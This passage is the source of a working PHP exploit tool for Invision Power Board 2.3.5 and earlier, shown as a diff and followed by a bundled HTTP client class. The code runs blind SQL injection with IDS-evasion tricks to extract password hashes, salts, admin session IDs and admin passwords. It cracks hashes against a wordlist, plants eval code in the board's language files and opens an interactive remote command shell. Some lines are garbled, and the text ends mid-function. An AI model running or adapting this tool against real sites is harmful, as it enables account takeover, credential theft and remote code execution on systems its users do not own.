+		
+		if( !$this->p_salt )
+		{
+			$this->msg('Trying to get the password salt', 0);
+			
+			if( !$this->get_pass_salt() )
+			{
+				$this->msg('Can\'t get the password salt', -1);
+				exit(1);
+			}
+			else 
+			$this->p_salt = $this->data['pass_salt'];
+		}
+		
+		$this->msg('Ok, using salt '.$this->p_salt, 1);
+		
+		$dico_c = file($this->p_dict);
+		
+		$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
+		$this->msg('You should take a drink ...', 0);
+		
+		foreach( $dico_c as $line )
+		{
+			if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) )
+			{
+				$this->msg('Found something cool =]', 1);
+				$this->msg('User password: '.$line, 1);
+				exit(1);
+			}
+		}
+		
+		$this->msg('End of the wordlist, password not found', -1);
+		
+		return;
+	}
+	
+	function set_sql_param()
+	{
+		$this->p_url   = $this->get_p('url', true);
+		$this->p_pre   = $this->get_p('prefix');
+		
+		# Table prefix
+		if( !$this->p_pre )
+		{
+			# Default table prefix if not precised
+			$this->msg('Using default table prefix: ibf_', 1);
+			$this->p_pre = 'ibf_';
+		}
+		else 
+		$this->msg('Using table prefix '.$this->p_pre, 1);
+
+	}
+	
+	function set_sql_focus()
+	{
+		$this->p_uname = $this->get_p('uname');
+		$this->p_uid   = $this->get_p('uid');
+		
+		if( $this->p_uname )
+		$this->msg('Using targeted username '.$this->p_uname, 1);
+		
+		elseif( $this->p_uid )
+		$this->msg('Using targeted user id '.$this->p_uid, 1);
+		
+		# Target
+		if( !($this->p_uname || $this->p_uid) )
+		{
+			# Default uid if not precised
+			$this->msg('Using default user id: 1', 1);
+			$this->p_uid = 1;
+		}
+
+		# Focus on ?
+		if( $this->p_uname )
+		$this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\'';
+		
+		else 
+		$this->t_on = 'id='.(int)$this->p_uid;
+		
+		return;
+	}
+	
+	function exec_code()
+	{
+		$this->write_code();
+		
+		while( $this->cmd_prompt() )
+		{
+			$this->web->addheader('My-Code', $this->cmd);
+			$this->web->get($this->p_url);
+
+			print "\n".$this->get_answer();
+		}
+		
+		exit(0);
+	}
+	
+	function get_answer()
+	{
+		$res_a = explode($this->res_sep, $this->web->getcontent());
+		
+		if( !$res_a[1] )
+		return 'No result to retrieve';
+		
+		else 
+		return $res_a[1];
+	}
+	
+	function cmd_prompt()
+	{
+		$this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true);
+		
+		if( !ereg('^(quit|exit)$', $this->cmd) )
+		{		
+			$this->cmd = base64_encode($this->cmd);
+			$this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send);
+			
+			return TRUE;
+		}
+
+		else
+		   return FALSE;
+	}
+	
+	function write_code()
+	{
+		# Gimme the language ID
+		$this->get_def_lang();
+		
+		# Current lang settings
+		$p_dat =
+		'code=edit2&act=lang&id='.$this->g_lid.'§ion'.
+		'=lookandfeel&lang_file=lang_boards.php';
+		
+		$this->web->post($this->a_url, $p_dat);
+
+		# We collect each variable name / value
+		if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) )
+		{
+			# POST data 
+			$p_dat =
+			'code=doedit&act=lang&id='.$this->g_lid.
+			'&lang_file=lang_boards.php§ion=lo'.
+			'okandfeel&';
+
+			# &Name=Value
+			for( $i=0; $imsg('Can\'t find block variables', 0);
+			exit(1);
+		}
+		
+		return;
+	}
+	
+	function get_def_lang()
+	{
+		$this->msg('Trying to get the set language id', 0);
+		
+		$this->web->get($this->a_url.'§ion=lookandfeel&act=lang');
+		
+		if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) )
+		{
+			$this->g_lid = $lids[1];
+			$this->msg('Using language id '.$this->g_lid, 1);
+		}
+		else 
+		{
+			$this->msg('Can\'t get the default language id', -1);
+			exit(1);
+		}
+		
+		return;
+	}
+	
+	function is_logged()
+	{
+		$this->bypass_matches();
+
+		# User session ok ?
+		if( !$this->s_admin )
+		{
+			$match = 'act=Login&CODE=03';
+			$this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);
+			$this->web->get($this->p_url);
+		}
+		
+		# Admin session ok ?
+		else
+		{
+			$match = '§ion=';
+			$this->web->get($this->a_url);
+		}
+		
+		if( preg_match("/$match/i", $this->web->getcontent()) )
+		return true;
+		
+		else 
+		return false;		
+	}
+	
+	function bypass_matches()
+	{
+		# match_browser
+		$this->web->agent($this->s_agent);
+		
+		# match_ipaddress
+		$this->web->addheader('Client-IP', $this->s_ip);
+		
+		return;
+	}
+	
+	function get_cprefix()
+	{
+		$this->msg('Trying to get the cookie prefix', 0);
+				
+		# Set-Cookie: session_id=...; path=/
+		$this->web->get($this->p_url);
+		
+		$this->s_cprefix = '';
+		
+		if( $this->web->cookie )
+		{
+			foreach( $this->web->cookie as $name => $value)
+			{
+				if( preg_match($this->reg_cpre, $name, $cmatches) )
+				{
+					$this->s_cprefix = $cmatches[1];
+					break;
+				}
+			}
+		}
+		
+		if( !$this->s_cprefix )
+		$this->msg('No cookie prefix set', 1);
+		
+		else 
+		$this->msg('Using cookie prefix '.$this->s_cprefix, 1);
+		
+		return;
+	}
+	
+	function get_sec_options()
+	{
+		# If no value, take the default one
+		$this->get_conf('t.conf_value');
+		$this->get_conf('t.conf_default');
+		
+		return;
+	}
+	
+	function get_conf($field)
+	{
+		$this->init_sql();
+		
+		$this->t_table = 'conf_settings';	
+		$this->t_field = $field;
+		$this->t_char  = $this->chr_num;
+		
+		$this->t_add_0 = "AND t.conf_key='match_browser'";
+
+		if( $this->conf['browser'] === '' )
+		$this->conf['browser'] = $this->bf_inj();
+
+		$this->t_add_0 = "AND t.conf_key='match_ipaddress'";
+		
+		if( $this->conf['ip'] === '' )
+		$this->conf['ip'] = $this->bf_inj();
+		
+		$this->t_add_0 = "AND t.conf_key='xforward_matching'";
+		
+		if( $this->conf['xforward'] === '' )
+		$this->conf['xforward'] = $this->bf_inj();
+
+		return;
+	}
+	
+	function get_login_key()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'login_key';
+		$this->t_table           = 'members';
+		$this->t_field           = 't.member_login_key';
+		$this->t_join            = 't.id=m.id';
+		$this->t_char            = $this->chr_md5;
+		$this->data['login_key'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_sql_user()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'user()';
+		$this->t_table           = 'members';
+		$this->t_field           = 'user()';
+		$this->t_char            = $this->chr_all;
+		$this->t_end             = '@';
+		$this->data['sql_user']  = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_pass_hash()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'pass_hash';
+		$this->t_table           = 'members_converge';
+		$this->t_field           = 't.converge_pass_hash';
+		$this->t_join            = 't.converge_email=m.email';
+		$this->t_char            = $this->chr_md5;
+		$this->data['pass_hash'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_pass_salt()
+	{	
+		$this->init_sql();
+		
+		$this->t_key             = 'pass_salt';
+		$this->t_table           = 'members_converge';
+		$this->t_field           = 't.converge_pass_salt';
+		$this->t_join            = 't.converge_email=m.email';
+		$this->t_char            = $this->chr_all;
+		$this->data['pass_salt'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_admin_sess()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'admin_sid';
+		$this->t_table           = 'admin_sessions';
+		$this->t_field           = 't.session_id';
+		$this->t_join            = 't.session_member_id=m.id';
+		$this->t_sel             = 't.session_log_in_time';
+		$this->t_char            = $this->chr_md5;
+		$this->data['a_sess_id'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_admin_ip()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'admin_ip';
+		$this->t_table           = 'admin_sessions';
+		$this->t_field           = 't.session_ip_address';
+		$this->t_join            = 't.session_member_id=m.id';
+		$this->t_sel             = 't.session_log_in_time';
+		$this->t_char            = $this->chr_ip;
+		$this->data['a_ip_addr'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_admin_pwd()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'admin_pwd';
+		$this->t_table           = 'admin_login_logs';
+		$this->t_field           = 't.admin_post_details';
+		$this->t_join            = 't.admin_username=m.members_l_username';
+		$this->t_sel             = 't.admin_id';
+		$this->t_end             = '"';
+		$this->t_bchar           = -4; # ";}}
+		$this->t_char            = $this->chr_all;
+		$this->data['a_pwd_like']= $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_user_sess()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'user_sid';
+		$this->t_table           = 'sessions';
+		$this->t_field           = 't.id';
+		$this->t_join            = 't.member_id=m.id';
+		$this->t_sel             = 't.running_time';
+		$this->t_char            = $this->chr_md5;
+		$this->data['u_sess_id'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_user_ip()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'user_ip';
+		$this->t_table           = 'sessions';
+		$this->t_field           = 't.ip_address';
+		$this->t_join            = 't.member_id=m.id';
+		$this->t_sel             = 't.running_time';
+		$this->t_char            = $this->chr_ip;
+		$this->data['u_ip_addr'] = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function get_user_agent()
+	{
+		$this->init_sql();
+		
+		$this->t_key             = 'user_agent';
+		$this->t_table           = 'sessions';
+		$this->t_field           = 't.browser';
+		$this->t_join            = 't.member_id=m.id';
+		$this->t_sel             = 't.running_time';
+		$this->t_char            = $this->chr_all;
+		$this->data['u_agent']   = $this->bf_inj();
+		
+		return $this->key_val;
+	}
+	
+	function init_sql()
+	{
+		# SQL Injection params
+		$this->t_end   = null;
+		$this->t_add_0 = '';
+		$this->t_add_1 = '';
+		$this->t_sel   = '1';
+		$this->t_bchar = 0;
+		$this->t_join  = '';
+		$this->t_key   = '';
+		$this->t_add_1 = 'ORDER BY id DESC LIMIT 1';
+		
+		return;
+	}
+	
+	function init_global()
+	{
+		# Charsets
+		$this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²"@');
+		$this->chr_num = range(0, 9);
+		$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
+		$this->chr_ip  = array_merge( $this->chr_num, array('.') );
+		$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );
+		$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );
+
+		# SQL Injection
+		$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';
+	
+		# IDS Evasion via %0D
+		$this->def_inj   = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #";
+		
+		# Results
+		$this->data = array();
+		$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');
+		
+		# Misc
+		$this->stat     = array(-1 => '-', 0 => '/', 1 => '+');
+		$this->s_bypass = false;
+		$this->res_sep  = md5(rand());
+		$this->def_ip   = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);
+		
+		# PHP Code
+		$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';
+		$this->php_send	 = "print('$this->res_sep');@system(base64_decode('%CMD%'));";
+		$this->php_send .= "print('$this->res_sep');exit(0);";
+		
+		# Regex
+		$this->reg_lang = '#[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
+		$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea>#i";
+		$this->reg_cpre = '#^(.*)session_id$#';
+		# $this->reg_acp  = '#s_agent = 'Mozilla Firefox';
+		$this->s_ip    = $this->def_ip;
+		
+		return;
+	}
+	
+	function bf_inj()
+	{
+		$this->sub_chr = $this->t_bchar;
+		$this->key_val = '';
+			
+		if( !empty($this->t_key) )
+		$this->msg('', 0);
+		
+		while( true )
+		{
+			if( $this->t_bchar < 0 )
+			$this->sub_chr--;
+			
+			else
+			$this->sub_chr++;
+	
+			# 0-9a-f
+			for( $j=0;$j<=count($this->t_char);$j++ )
+			{
+				# That one ?
+				$chr = $this->t_char[$j];
+				
+				# Latest char ?
+				if( $j === count($this->t_char) )
+				$chr = $this->t_end;
+				
+				# Ascii num
+				$asc = ord($chr);
+				
+				# Screen bug
+				if( !empty($this->t_key) ) 
+				{
+					$msg  = $this->t_key.'='.$this->key_val;
+					$msg .= ($chr === $this->t_end ? "\x20" : $chr);
+					
+					$this->msg($msg, 0, 1, 1);
+				}
+				
+				# Focus on the target ?
+				if( !empty($this->t_join) )
+				{
+					$inj = 
+					'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
+					' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join.
+					' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field.
+					','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;
+				}
+				else 
+				{
+					$inj =
+					'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
+					' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
+					',1))='.$asc.' '.$this->t_add_0;
+				}
+
+				# SQL Injection via rawurldecode()
+				$inj = str_replace('%rep_req%', $inj, $this->def_inj);
+				$inj = str_replace('%rep_add%', $this->t_add_1, $inj);
+				$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
+				
+				# Params
+				$inj = str_replace('%rep_inj%', $inj, $this->def_param);
+				$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
+				
+				$this->web->get($this->p_url.$inj);
+
+				# Ok !?
+				if( !strstr($this->web->getcontent(), 'notfound') )
+				{
+					if( $chr !== $this->t_end )
+					{	
+						$this->key_val .= $chr;
+						break;
+					}
+				}
+				
+				# End
+				if( $chr === $this->t_end )
+				{
+					# Reverse
+					if( $this->t_bchar < 0 )
+					$this->key_val = strrev($this->key_val);
+					
+					if( !empty($this->t_key) ) 
+					$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);
+
+					return $this->key_val;
+				}
+			}
+		}
+		
+	}
+	
+	function get_p($p, $exit=false)
+	{
+		global $argv;
+		
+		foreach( $argv as $key => $value )
+		{
+			if( $value === '-'.$p )
+			{
+				if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
+				{					
+					return $argv[$key+1];
+				}
+				else
+				{
+					if( $exit )
+					$this->usage();
+					
+					return true;
+				}
+			}
+		}
+		
+		if( $exit )
+		$this->usage();
+		
+		return false;
+	}
+	
+	function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
+	{
+		if( $ndel ) $type = "\r";
+		else        $type = "\n";
+		
+		# wtf (:
+		print
+		(
+			$type.str_repeat("\x20", $nspace).
+			$this->stat[$nstatus]."\x20".$msg
+		);
+		
+		if( $ask )
+		return trim(fgets(STDIN));
+	}
+	
+	function give_hope()
+	{				
+		$this->msg('You should try with another user or try another time', -1);
+			
+		exit(1);
+	}
+	
+	function mhead()
+	{
+		# Advisory: http://acid-root.new.fr/?0:18
+		
+		print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";
+		print "\n ------------------------------------------------------";
+		print "\n\n About:";
+		print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
+		print "\n http://acid-root.new.fr/";
+		print "\n #acidroot@irc.worldnet.net";
+		print "\n\n\n Attack(s):\n";
+		
+		return;
+	}
+	
+	function usage()
+	{
+
+		print "\n -attack   [options]\n\n";
+		print "  1 - PHP code execution\n\n";
+		print "    -url        IPB url with ending slash\n\n";
+		print "    -uname      targeted username\n";
+		print "    -uid        OR the targeted user id (def: 1)\n\n";
+		print "    -prefix     sql table prefix (def: ibf_)\n";
+		print "    -acp        admin control panel path (def: admin)\n\n\n";
+		print "  2 - Insecure SQL password usage\n\n";
+		print "    -ip         your current IP\n";
+		print "    -dict       a wordlist file\n\n";
+		print "    -url        IPB url with ending slash\n";
+		print "    -uname      a valid member username\n";
+		print "    -pwd        the associated password\n\n";
+		print "    -uid        OR  the targeted member id\n";
+		print "    -passhash   the passhash cookie value\n";
+		print "    -stronghold the stronghold cookie value\n\n";
+		print "    -sqlusr     you can precise the sql user\n";
+		print "    -prefix     sql table prefix (def: ibf_)\n\n\n";
+		print "  3 - Password bruteforcer\n\n";
+		print "    -dict       a wordlist file\n\n";
+		print "    -url        IPB url with ending slash\n";
+		print "    -uname      targeted username\n";
+		print "    -uid        OR  the targeted user id (def: 1)\n";
+		print "    -prefix     sql table prefix (def: ibf_)\n\n";
+		print "    -passhash   OR the passhash value\n";
+		print "    -salt       the salt value\n\n\n";
+		print "  Optional: \n\n";
+		print "    -proxhost        if you wanna use a proxy\n";
+		print "    -proxauth   proxy with authentication\n";
+		
+		exit(1);
+	}
+	
+}
+
+
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.1
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2008-08-29] (2.1)
+ *  * New: The showheader()/showcookie() functions can now return an array
+ *  * Bug #3 fixed: Problem concerning some servers for the main function
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+	
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket, $this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+	
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @return  array  $this->head Headers
+	 * @example $this->showheader()
+	 * @example $this->showheader(1)
+	 * 
+	 */
+	function showheader($array='')
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		if(!empty($array))
+			return $this->header;
+			
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @return  array  $this->cookie Cookies
+	 * @example $this->showcookie()
+	 * @example $this->showcookie(1)
+	 * 
+	 */
+	function showcookie($array='')
+	{
+		if(!isset($this->cookie))
+		   return;
+		 
+		if(!empty($array))
+			return $this->cookie;
+		
+		$this->cookie_str = '';
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->get('localhost/index.php?var=x')
+	 * @example $this->get('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => ''));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->get('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$iserver_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		
